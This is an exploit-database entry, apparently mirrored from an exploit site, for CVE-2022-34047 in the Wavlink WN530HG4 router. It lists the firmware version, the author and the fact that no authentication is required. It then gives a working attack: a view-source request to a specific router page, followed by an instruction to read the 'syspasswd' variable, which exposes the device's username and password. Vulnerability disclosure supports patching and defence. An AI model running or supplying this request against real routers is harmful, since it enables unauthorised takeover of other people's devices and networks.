id: 37877
date: 08/01/2022
title: Wavlink WN530HG4 - Password Disclosure Vulnerability
author: Ahmed Alroky
cves: CVE-2022-34047

# Exploit Title: Wavlink WN530HG4 - Password Disclosure
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M30HG4.V5030.191116
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34047
# Tested on: Windows

# Exploit

view-source:http://IP_address/set_safety.shtml?r=52300
search for var syspasswd="
you will find the username and the password

#  0day.today [2023-03-26]  #